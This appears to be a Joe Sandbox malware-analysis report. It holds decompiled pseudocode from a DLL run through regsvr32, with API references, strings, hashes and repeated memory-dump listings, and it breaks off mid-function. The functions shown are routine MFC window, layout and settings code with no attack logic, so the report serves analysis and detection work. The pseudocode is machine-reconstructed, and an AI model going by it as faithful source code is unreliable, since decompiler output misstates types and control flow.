Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: CapsCreateDeviceFontH_prolog3_IndirectObject
String ID:
API String ID: 2429671754-3916222277
Opcode ID: c40c12fe3be4be559ea53c661c0170e3f5bd0dd14fd6b9e177c80991e0598783
Instruction ID: 8110959a6e54c0f51d5823ab9e749c0ccfc70fdb1bbb8e213e6bcc0a527dad41
Opcode Fuzzy Hash: c40c12fe3be4be559ea53c661c0170e3f5bd0dd14fd6b9e177c80991e0598783
Instruction Fuzzy Hash: C74157349016899EDB14CFE4C941ADCFBF4FF19340F50816AE599EB296EBB49A04CB10

Uniqueness

Uniqueness Score: -1.00%

Function 100361C3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100361C3(intOrPtr* __ecx, int _a4, signed int _a8, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t31;
				void* _t37;
				void* _t41;
				intOrPtr* _t43;
				void* _t44;
				int _t45;
				intOrPtr* _t48;
				void* _t49;

				_t42 = __ecx;
				_t48 = __ecx;
				_t41 = L10014BA7(__ecx);
				_t50 = _t41;
				if(_t41 == 0) {
					E1000A069(_t41, _t42, _t44, _t48, _t50);
				}
				_t43 =  *((intOrPtr*)(_t48 + 0x80));
				_t45 = _a4;
				if(_t43 == 0) {
					L4:
					if(_a8 != 0xffff) {
						__eflags = _t45;
						if(_t45 == 0) {
							L17:
							_t22 = _t48 + 0xa8;
							 *_t22 =  *(_t48 + 0xa8) & 0x00000000;
							__eflags =  *_t22;
							L18:
							_t24 = _t41 + 0x3c;
							 *_t24 =  *(_t41 + 0x3c) | 0x00000040;
							__eflags =  *_t24;
							L19:
							_t31 =  *(_t48 + 0xa8);
							if(_t31 ==  *((intOrPtr*)(_t48 + 0xac))) {
								goto L22;
							}
							_t31 = E10013FEA(_t41, _t43, _t49, GetParent( *(_t48 + 0x20)));
							if(_t31 == 0) {
								goto L22;
							}
							return PostMessageA( *(_t48 + 0x20), 0x36a, 0, 0);
						}
						__eflags = _a8 & 0x00000810;
						if((_a8 & 0x00000810) != 0) {
							goto L17;
						}
						__eflags = _t45 - 0xf000 - 0x1ef;
						if(_t45 - 0xf000 > 0x1ef) {
							__eflags = _t45 - 0xff00;
							if(_t45 < 0xff00) {
								L14:
								 *(_t48 + 0xa8) = _t45;
								goto L18;
							}
							 *(_t48 + 0xa8) = 0xef1f;
							goto L18;
						}
						_t45 = (_t45 + 0xffff1000 >> 4) + 0xef00;
						__eflags = _t45;
						goto L14;
					}
					 *(_t48 + 0x3c) =  *(_t48 + 0x3c) & 0xffffffbf;
					if( *((intOrPtr*)(_t41 + 0x68)) != 0) {
						 *(_t48 + 0xa8) = 0xe002;
					} else {
						 *(_t48 + 0xa8) = 0xe001;
					}
					SendMessageA( *(_t48 + 0x20), 0x362,  *(_t48 + 0xa8), 0);
					_t43 = _t48;
					_t37 =  *((intOrPtr*)( *_t48 + 0x154))();
					if(_t37 != 0) {
						UpdateWindow( *(_t37 + 0x20));
					}
					goto L19;
				} else {
					_t31 =  *((intOrPtr*)( *_t43 + 0x7c))(_t45, _a8, _a12);
					if(_t31 != 0) {
						L22:
						return _t31;
					}
					goto L4;
				}
			}

0x100361c3
0x100361c9
0x100361d0
0x100361d2
0x100361d4
0x100361d6
0x100361d6
0x100361db
0x100361e3
0x100361e6
0x100361fc
0x10036203
0x10036254
0x10036256
0x10036298
0x10036298
0x10036298
0x10036298
0x1003629f
0x1003629f
0x1003629f
0x1003629f
0x100362a3
0x100362a3
0x100362af
0x00000000
0x00000000
0x100362bb
0x100362c2
0x00000000
0x00000000
0x00000000
0x100362d0
0x10036258
0x1003625e
0x00000000
0x00000000
0x10036266
0x1003626b
0x10036284
0x1003628a
0x1003627c
0x1003627c
0x00000000
0x1003627c
0x1003628c
0x00000000
0x1003628c
0x10036276
0x10036276
0x00000000
0x10036276
0x10036205
0x1003620d
0x1003621b
0x1003620f
0x1003620f
0x1003620f
0x10036235
0x1003623d
0x1003623f
0x10036247
0x1003624c
0x1003624c
0x00000000
0x100361e8
0x100361f1
0x100361f6
0x100362da
0x100362da
0x100362da
0x00000000
0x100361f6

APIs

SendMessageA.USER32 ref: 10036235
UpdateWindow.USER32 ref: 1003624C
GetParent.USER32(?), ref: 100362B4
PostMessageA.USER32(?,0000036A,00000000,00000000), ref: 100362D0

Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A

Strings

@, xrefs: 1003629F

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Message$Exception@8H_prolog3ParentPostSendThrowUpdateWindow
String ID: @
API String ID: 33412044-2766056989
Opcode ID: e55ebaaaa6bcd21f69dba378561192110661c72613a9bde20aad739576272f48
Instruction ID: ee07a5994753447d1fba64953ed39fe2121cc4a9fa9f8d6d0d49d64af206bfb4
Opcode Fuzzy Hash: e55ebaaaa6bcd21f69dba378561192110661c72613a9bde20aad739576272f48
Instruction Fuzzy Hash: 7C31A231600F01AFE7619F20CC84B9B77E4FF49396F12C528E99A9E1A0CB71A8548B10

Uniqueness

Uniqueness Score: -1.00%

Function 10037E19 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E10037E19(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t62;
				intOrPtr _t64;
				void* _t67;
				void* _t68;

				_t62 = __edx;
				_t52 = __ebx;
				_push(0x28);
				E100476B6(0x10090c8a, __ebx, __edi, __esi);
				_t64 =  *((intOrPtr*)(_t68 + 8));
				_t67 = __ecx;
				L1000140B(_t68 - 0x34, E100184C0());
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				if((E100177F8(__ecx) & 0x00004000) == 0) {
					_t56 = _t68 - 0x34;
					E1001069E(_t68 - 0x34, __ecx + 0xc4);
					if(_t64 != 0) {
						E1000B029(_t68 - 0x34, " - ");
						_t56 = _t68 - 0x34;
						E1000B029(_t68 - 0x34, _t64);
						_t38 =  *((intOrPtr*)(_t67 + 0x58));
						if( *((intOrPtr*)(_t67 + 0x58)) > 0) {
							E1004C19A(_t68 - 0x30, 0x20, ":%d", _t38);
							_t56 = _t68 - 0x34;
							E1000B029(_t68 - 0x34, _t68 - 0x30);
						}
					}
					L9:
					_t65 =  *((intOrPtr*)(_t68 - 0x34));
					E100219F5(_t56, _t62,  *((intOrPtr*)(_t67 + 0x20)),  *((intOrPtr*)(_t68 - 0x34)));
					L100013E3(_t65 - 0x10, _t62);
					return E10047739(_t52, _t65, _t67);
				}
				if(_t64 == 0) {
					L5:
					_t56 = _t68 - 0x34;
					E1001069E(_t68 - 0x34, _t67 + 0xc4);
					goto L9;
				}
				E1000B029(_t68 - 0x34, _t64);
				_t46 =  *((intOrPtr*)(_t67 + 0x58));
				if( *((intOrPtr*)(_t67 + 0x58)) > 0) {
					E1004C19A(_t68 - 0x30, 0x20, ":%d", _t46);
					E1000B029(_t68 - 0x34, _t68 - 0x30);
				}
				E1000B029(_t68 - 0x34, " - ");
				goto L5;
			}

0x10037e19
0x10037e19
0x10037e19
0x10037e20
0x10037e25
0x10037e28
0x10037e33
0x10037e38
0x10037e47
0x10037ea2
0x10037ea5
0x10037eac
0x10037eb6
0x10037ebc
0x10037ebf
0x10037ec4
0x10037ec9
0x10037ed7
0x10037ee3
0x10037ee6
0x10037ee6
0x10037ec9
0x10037eeb
0x10037eeb
0x10037ef2
0x10037efa
0x10037f04
0x10037f04
0x10037e4b
0x10037e8a
0x10037e91
0x10037e94
0x00000000
0x10037e94
0x10037e51
0x10037e56
0x10037e5b
0x10037e69
0x10037e78
0x10037e78
0x10037e85
0x00000000

APIs

__EH_prolog3_GS.LIBCMT ref: 10037E20

Part of subcall function 100177F8: GetWindowLongA.USER32(?,000000F0), ref: 10017803

_swprintf.LIBCMT ref: 10037E69

Part of subcall function 1004C19A: __vsprintf_s_l.LIBCMT ref: 1004C1AD

Part of subcall function 1000B029: _strlen.LIBCMT ref: 1000B03A

_swprintf.LIBCMT ref: 10037ED7

Strings

:%d, xrefs: 10037E5E, 10037ECC
- , xrefs: 10037E7D, 10037EAE

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: _swprintf$H_prolog3_LongWindow__vsprintf_s_l_strlen
String ID: - $:%d
API String ID: 1012054303-2359489159
Opcode ID: 63244a309c4e1ce2be867d77882b35079c284ff71caf3314a712287f9dfc3e77
Instruction ID: fd64e6a11f349006b99ad3e3af546d366868ae2af92203d1d57b90f4a38e4adb
Opcode Fuzzy Hash: 63244a309c4e1ce2be867d77882b35079c284ff71caf3314a712287f9dfc3e77
Instruction Fuzzy Hash: 6E21AF7A801208AAE721EBA0ED56EFF73B9FF14341F500529B516A7195EF30BE08CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10011243 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E10011243(void* __edi, intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				int _t14;
				int _t18;
				intOrPtr* _t23;
				void* _t25;

				if(L10010FF9() == 0) {
					if(_a4 != 0x12340042) {
						L9:
						_t14 = 0;
						L10:
						return _t14;
					}
					_t23 = _a8;
					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
						goto L9;
					} else {
						 *((intOrPtr*)(_t23 + 4)) = 0;
						 *((intOrPtr*)(_t23 + 8)) = 0;
						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
						_t18 = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t23 + 0x10) = _t18;
						 *((intOrPtr*)(_t23 + 0x24)) = 1;
						if( *_t23 >= 0x48) {
							E1004BFF9(_t25, _t23 + 0x28, 0x20, "DISPLAY", 0x1f);
						}
						_t14 = 1;
						goto L10;
					}
				}
				return  *0x100bda28(_a4, _a8);
			}

0x10011250
0x10011269
0x100112d4
0x100112d4
0x100112d6
0x00000000
0x100112d7
0x1001126b
0x10011272
0x00000000
0x1001128b
0x1001128c
0x1001128f
0x1001129d
0x100112a0
0x100112a8
0x100112a9
0x100112aa
0x100112ab
0x100112b2
0x100112b5
0x100112b9
0x100112c8
0x100112cd
0x100112d0
0x00000000
0x100112d0
0x10011272
0x00000000

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 10011281
GetSystemMetrics.USER32 ref: 10011299
GetSystemMetrics.USER32 ref: 100112A0

Strings

B, xrefs: 10011260
DISPLAY, xrefs: 100112BD

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: System$Metrics$InfoParameters
String ID: B$DISPLAY
API String ID: 3136151823-3316187204
Opcode ID: 8068e71f5c3a869b75398deb8be0d862eb1a0e925b55f4283e17b1e2f9b4c0f4
Instruction ID: 97ef3e79cf9e065ce80cb2f78251b648008c7c77418a083fa39792e940d8eb31
Opcode Fuzzy Hash: 8068e71f5c3a869b75398deb8be0d862eb1a0e925b55f4283e17b1e2f9b4c0f4
Instruction Fuzzy Hash: DE11A371A00325ABDF15DFA5DC84ADBBBA8EF06790B014061FD05EE446D2B1D890CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 1001B7F6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001B7F6(void* __ebx, void* __ecx, void* __edx, void* __eflags, struct HWND__** _a4) {
				void* __edi;
				struct HWND__* _t10;
				struct HWND__* _t12;
				struct HWND__* _t14;
				struct HWND__* _t15;
				int _t19;
				void* _t21;
				void* _t25;
				struct HWND__** _t26;
				void* _t27;

				_t25 = __edx;
				_t21 = __ebx;
				_t26 = _a4;
				_t27 = __ecx;
				if(E10011BA4(__ecx, __eflags, _t26) == 0) {
					_t10 = L10014BA7(__ecx);
					__eflags = _t10;
					if(_t10 == 0) {
						L5:
						__eflags = _t26[1] - 0x100;
						if(_t26[1] != 0x100) {
							L13:
							return E10012240(_t26);
						}
						_t12 = _t26[2];
						__eflags = _t12 - 0x1b;
						if(_t12 == 0x1b) {
							L8:
							__eflags = GetWindowLongA( *_t26, 0xfffffff0) & 0x00000004;
							if(__eflags == 0) {
								goto L13;
							}
							_t14 = E10021C2F(_t21, _t25, _t26, __eflags,  *_t26, "Edit");
							__eflags = _t14;
							if(_t14 == 0) {
								goto L13;
							}
							_t15 = GetDlgItem( *(_t27 + 0x20), 2);
							__eflags = _t15;
							if(_t15 == 0) {
								L12:
								SendMessageA( *(_t27 + 0x20), 0x111, 2, 0);
								goto L1;
							}
							_t19 = IsWindowEnabled(_t15);
							__eflags = _t19;
							if(_t19 == 0) {
								goto L13;
							}
							goto L12;
						}
						__eflags = _t12 - 3;
						if(_t12 != 3) {
							goto L13;
						}
						goto L8;
					}
					__eflags =  *(_t10 + 0x68);
					if( *(_t10 + 0x68) == 0) {
						goto L5;
					}
					return 0;
				}
				L1:
				return 1;
			}

0x1001b7f6
0x1001b7f6
0x1001b7f8
0x1001b7fd
0x1001b806
0x1001b80f
0x1001b814
0x1001b816
0x1001b822
0x1001b822
0x1001b829
0x1001b884
0x00000000
0x1001b887
0x1001b82b
0x1001b82e
0x1001b831
0x1001b838
0x1001b842
0x1001b844
0x00000000
0x00000000
0x1001b84d
0x1001b852
0x1001b854
0x00000000
0x00000000
0x1001b85b
0x1001b861
0x1001b863
0x1001b870
0x1001b87c
0x00000000
0x1001b87c
0x1001b866
0x1001b86c
0x1001b86e
0x00000000
0x00000000
0x00000000
0x1001b86e
0x1001b833
0x1001b836
0x00000000
0x00000000
0x00000000
0x1001b836
0x1001b818
0x1001b81c
0x00000000
0x00000000
0x00000000
0x1001b81e
0x1001b808
0x00000000

Strings

Edit, xrefs: 1001B846

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID: Edit
API String ID: 0-554135844
Opcode ID: a05c97695a32eb97e0a893a7320ccb4d8a6aa492ae763224ec430d27a9d8552c
Instruction ID: 07053561f4277099a3d04e1c325a2f95bcac334b9408a2c0d6db1208d980b8c9
Opcode Fuzzy Hash: a05c97695a32eb97e0a893a7320ccb4d8a6aa492ae763224ec430d27a9d8552c
Instruction Fuzzy Hash: 4201C035600A02ABEB14DA258C45B9AB2ECEF41FD5F514528F442DA0B0DF70ECD0C690

Uniqueness

Uniqueness Score: -1.00%

Function 100190D4 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E100190D4(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t20;
				intOrPtr _t26;
				void* _t32;
				void* _t33;

				_push(4);
				E1004764D(0x1008ecee, __ebx, __edi, __esi);
				_t32 = __ecx;
				 *((intOrPtr*)(_t33 - 0x10)) = 0;
				E10019074(__ecx, 0x20, _t33 - 0x10);
				if( *((intOrPtr*)(_t33 + 8)) != 0) {
					_t36 =  *((intOrPtr*)(_t33 - 0x10));
					if( *((intOrPtr*)(_t33 - 0x10)) == 0) {
						_t26 = E10009F14(_t36, 0x20);
						 *((intOrPtr*)(_t33 - 0x10)) = _t26;
						_t37 = _t26;
						 *(_t33 - 4) = 0;
						if(_t26 == 0) {
							_t20 = 0;
							__eflags = 0;
						} else {
							_push(0x1e);
							_push( *((intOrPtr*)(_t33 + 8)));
							_push("File%d");
							_push("Recent File List");
							_push(0);
							_t20 = L100269C0(__ebx, _t26, 0, _t32, _t37);
						}
						 *(_t33 - 4) =  *(_t33 - 4) | 0xffffffff;
						 *((intOrPtr*)(_t32 + 0x88)) = _t20;
						 *((intOrPtr*)( *_t20 + 0x10))();
					}
				}
				 *((intOrPtr*)(_t32 + 0x94)) = E10025F92(_t32, "Settings", "PreviewPages", 0);
				return E10047725(_t17);
			}

0x100190d4
0x100190db
0x100190e0
0x100190ea
0x100190ed
0x100190f5
0x100190f7
0x100190fa
0x10019104
0x10019106
0x10019109
0x1001910b
0x1001910e
0x10019127
0x10019127
0x10019110
0x10019110
0x10019112
0x10019115
0x1001911a
0x1001911f
0x10019120
0x10019120
0x10019129
0x1001912d
0x10019137
0x10019137
0x100190fa
0x1001914c
0x10019157

APIs

__EH_prolog3.LIBCMT ref: 100190DB

Part of subcall function 10009F14: _malloc.LIBCMT ref: 10009F2E

Part of subcall function 100269C0: __EH_prolog3.LIBCMT ref: 100269C7

Strings

File%d, xrefs: 10019115
PreviewPages, xrefs: 1001913B
Recent File List, xrefs: 1001911A
Settings, xrefs: 10019140

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: H_prolog3$_malloc
String ID: File%d$PreviewPages$Recent File List$Settings
API String ID: 1683881009-526586445
Opcode ID: 102062f58e8eb2ce84fc7bcee302e76a552dd2902e429c62ac920ed42ba2649f
Instruction ID: e2bdf456994b232c3ec09ff3447ed3ecde582c8e3873aa901323e6cb6196a485
Opcode Fuzzy Hash: 102062f58e8eb2ce84fc7bcee302e76a552dd2902e429c62ac920ed42ba2649f
Instruction Fuzzy Hash: 6C01A235E4060ABBCB15DFB48C15EBE76B1FF84750F20852EF2699B181DB7095809751

Uniqueness

Uniqueness Score: -1.00%

Function 1000C193 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E1000C193(void* __ecx, intOrPtr _a4) {
				struct HINSTANCE__* _t4;
				_Unknown_base(*)()* _t5;
				void* _t9;
				void* _t10;

				_t10 = __ecx;
				_t4 = GetModuleHandleA("GDI32.DLL");
				_t9 = 0;
				_t5 = GetProcAddress(_t4, "SetLayout");
				if(_t5 == 0) {
					if(_a4 != 0) {
						_t9 = 0xffffffff;
						SetLastError(0x78);
					}
				} else {
					_t9 =  *_t5( *((intOrPtr*)(_t10 + 4)), _a4);
				}
				return _t9;
			}

0x1000c19a
0x1000c19c
0x1000c1a8
0x1000c1aa
0x1000c1b2
0x1000c1c5
0x1000c1c9
0x1000c1cc
0x1000c1cc
0x1000c1b4
0x1000c1bd
0x1000c1bd
0x1000c1d6

APIs

GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,1004444D,00000000), ref: 1000C19C
GetProcAddress.KERNEL32(00000000,SetLayout,?,?,1004444D,00000000), ref: 1000C1AA
SetLastError.KERNEL32(00000078,?,?,1004444D,00000000), ref: 1000C1CC

Strings

SetLayout, xrefs: 1000C1A2
GDI32.DLL, xrefs: 1000C195

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: GDI32.DLL$SetLayout
API String ID: 4275029093-2147214759
Opcode ID: 4e63dc2d4395020bca6b567e20ec15d9c3cf4b3b9062aa123a5f3a41c6494be1
Instruction ID: 94626ab8e3bfee5670fa724d826468d4054a6831626c432c528c060394332660
Opcode Fuzzy Hash: 4e63dc2d4395020bca6b567e20ec15d9c3cf4b3b9062aa123a5f3a41c6494be1
Instruction Fuzzy Hash: C0E020331402107BE650971A4D88CCE3B93DBC3371B598615FB39C10A4C7398C559B20

Uniqueness

Uniqueness Score: -1.00%

Function 1000C15D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E1000C15D(signed int __ecx) {
				_Unknown_base(*)()* _t3;
				signed int _t7;
				signed int _t8;

				_t7 = __ecx;
				_t3 = GetProcAddress(GetModuleHandleA("GDI32.DLL"), "GetLayout");
				if(_t3 == 0) {
					_t8 = _t7 | 0xffffffff;
					SetLastError(0x78);
				} else {
					_t8 =  *_t3( *((intOrPtr*)(_t7 + 4)));
				}
				return _t8;
			}

0x1000c163
0x1000c171
0x1000c179
0x1000c186
0x1000c189
0x1000c17b
0x1000c180
0x1000c180
0x1000c192

APIs

GetModuleHandleA.KERNEL32(GDI32.DLL,?,10044440), ref: 1000C165
GetProcAddress.KERNEL32(00000000,GetLayout), ref: 1000C171
SetLastError.KERNEL32(00000078), ref: 1000C189

Strings

GetLayout, xrefs: 1000C16B
GDI32.DLL, xrefs: 1000C15E

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: GDI32.DLL$GetLayout
API String ID: 4275029093-2396518106
Opcode ID: 62a36cdf378d546a2627890dc174a3fe51776cdb57757038142c1d02188e673e
Instruction ID: 0ec2beb3e0e8ea4de9f101b9fc61ac14c10b2d7aa20409389975f5a3b332688b
Opcode Fuzzy Hash: 62a36cdf378d546a2627890dc174a3fe51776cdb57757038142c1d02188e673e
Instruction Fuzzy Hash: E6D05B315042316BE65067B55F4CDC63B54DB476A17490750FE39E21E4CF29CC4557D0

Uniqueness

Uniqueness Score: -1.00%

Function 1003D5A7 Relevance: 7.7, APIs: 5, Instructions: 214
windowCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E1003D5A7(intOrPtr __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
